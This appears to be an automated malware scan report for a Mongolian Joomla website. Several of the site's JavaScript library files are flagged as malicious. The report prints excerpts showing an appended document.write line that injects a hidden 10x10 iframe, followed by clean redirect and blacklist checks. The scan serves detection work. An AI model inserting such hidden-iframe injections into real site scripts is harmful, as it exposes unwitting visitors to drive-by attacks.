Scanned pages/files
| Request | Server response | Status |
http://sodonchimee.mn/ | 200 OK Content-Length: 22494 Content-Type: text/html | clean |
http://sodonchimee.mn/media/system/js/caption.js | 200 OK Content-Length: 2100 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://sodonchimee.mn/templates/mega_peryz/scripts/dropdown.js | 200 OK Content-Length: 4260 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(MooTools) != 'undefined'){ var subnav = new Array(); Element.extend( { hide: function(timeout) { this.status = 'hide'; clearTimeout (this.timeout); if (timeout) { this.timeout = setTimeout (this.anim.bind(this), timeout); }else{ this.anim(); } }, show: function(timeout) { this.status = for (var i=0; i<sfEls.length; ++i) { sfEls[i].onmouseover=function() { this.className+="sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp("sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); } document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://sodonchimee.mn/modules/mod_AutsonSlideShow/js/jquery-1.5.2.min.js | 200 OK Content-Length: 86062 Content-Type: text/javascript | clean |
http://sodonchimee.mn/modules/mod_AutsonSlideShow/js/jquery.easing.1.3.js | 200 OK Content-Length: 8234 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://sodonchimee.mn/modules/mod_AutsonSlideShow/js/jquery.animate-colors-min.js | 200 OK Content-Length: 1873 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d){function i(){var b=d("script:first"),a=b.css("color"),c=false;if(/^rgba/.test(a))c=true;else try{c=a!=b.css("color","rgba(0, 0, 0, 0.5)").css("color");b.css("color",a)}catch(e){}return c}function g(b,a,c){var e="rgb"+(d.support.rgba?"a":"")+"("+parseInt(b[0]+c*(a[0]-b[0]),10)+","+parseInt(b[1]+c*(a[1]-b[1]),10)+","+parseInt(b[2]+c*(a[2]-b[2]),10);if(d.support.rgba)e+=","+(b&&a?parseFloat(b[3]+c*(a[3]-b[3])):1);e+=")";return e}function f(b){var a,c;if(a=/#([0-9a-fA-F]{2})([0- document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://sodonchimee.mn/modules/mod_AutsonSlideShow/js/jquery.skitter.min.js | 200 OK Content-Length: 50379 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){var number_skitter=0,skitters=[];$.fn.skitter=function(options){return this.each(function(){$(this).data('skitter_number',number_skitter);skitters.push(new $sk(this,options,number_skitter));++number_skitter})};var defaults={velocity:1,interval:2500,animation:'',numbers:true,navigation:true,label:true,easing_default:'',box_skitter:null,time_interval:null,images_links:null,image_atual:null,link_atual:null,label_atual:null,width_skitter:null,height_skitter:null,image_i:1,is_animating:f document.write('<iframe src="http://www.google.com" scrolling="auto" frameborder="no" align="center" height="10" width="10"></iframe>'); Antivirus reports:
| ||
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 162593 Content-Type: application/x-javascript | clean |
http://sodonchimee.mn/index.php | 200 OK Content-Length: 22494 Content-Type: text/html | clean |
http://sodonchimee.mn/index.php?option=com_content&view=article&id=49&Itemid=53 | 200 OK Content-Length: 24049 Content-Type: text/html | clean |
http://sodonchimee.mn/index.php?option=com_content&view=article&id=67&Itemid=54 | 200 OK Content-Length: 23124 Content-Type: text/html | clean |
http://sodonchimee.mn/index.php?option=com_content&view=article&id=56&Itemid=55 | 200 OK Content-Length: 25011 Content-Type: text/html | clean |
http://sodonchimee.mn/index.php?option=com_content&view=article&id=57&Itemid=56 | 200 OK Content-Length: 22218 Content-Type: text/html | clean |
http://sodonchimee.mn/index.php?option=com_content&view=article&id=68&Itemid=70 | 200 OK Content-Length: 25230 Content-Type: text/html | clean |
http://sodonchimee.mn/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=57 | 200 OK Content-Length: 20933 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sodonchimee.mn
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 05:00:19 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 05:00:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 168fda8df22dce1831d8b5dce97ee68d=b8jack1967qmeq28lracj403i0; path=/
GET / HTTP/1.1
Host: sodonchimee.mn
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 05:00:19 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 05:00:19 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 168fda8df22dce1831d8b5dce97ee68d=b8jack1967qmeq28lracj403i0; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: sodonchimee.mn
Referer: http://www.google.com/search?q=sodonchimee.mn
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sodonchimee.mn
Referer: http://www.google.com/search?q=sodonchimee.mn
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sodonchimee.mn
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sodonchimee.mn/
Result: sodonchimee.mn is not infected or malware details are not published yet.
Result: sodonchimee.mn is not infected or malware details are not published yet.